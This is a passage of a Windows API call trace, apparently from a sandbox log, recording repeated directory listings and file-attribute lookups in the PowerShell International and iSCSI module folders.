lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.017] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.017] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 1 [0177.018] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 0 [0177.018] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.018] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0177.018] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", lpFilePart=0x0) returned 0x41 [0177.018] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.018] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.018] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 1 [0177.019] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.019] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.019] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0177.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.019] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.019] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0177.019] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", lpFilePart=0x0) returned 0x41 [0177.019] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.020] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.020] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 1 [0177.020] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 0 [0177.020] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.020] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\International.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\international.psd1")) returned 0x20 [0177.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.021] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0177.021] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", lpFilePart=0x0) returned 0x39 [0177.021] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.022] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.022] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI.psd1", cAlternateFileName="")) returned 1 [0177.022] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x185a, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSIConnection.cdxml", cAlternateFileName="")) returned 1 [0177.022] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSISession.cdxml", cAlternateFileName="")) returned 1 [0177.022] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a86, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITarget.cdxml", cAlternateFileName="")) returned 1 [0177.023] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 1 [0177.023] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 0 [0177.023] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.023] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0177.023] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", lpFilePart=0x0) returned 0x39 [0177.023] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.024] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.024] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI.psd1", cAlternateFileName="")) returned 1 [0177.024] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x185a, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSIConnection.cdxml", cAlternateFileName="")) returned 1 [0177.024] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSISession.cdxml", cAlternateFileName="")) returned 1 [0177.024] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a86, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITarget.cdxml", cAlternateFileName="")) returned 1 [0177.025] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 1 [0177.025] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.025] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.026] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0177.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.026] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.026] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0177.026] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", lpFilePart=0x0) returned 0x39 [0177.026] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.027] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.027] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI.psd1", cAlternateFileName="")) returned 1 [0177.027] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x185a, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSIConnection.cdxml", cAlternateFileName="")) returned 1 [0177.027] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSISession.cdxml", cAlternateFileName="")) returned 1 [0177.027] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a86, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITarget.cdxml", cAlternateFileName="")) returned 1 [0177.028] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 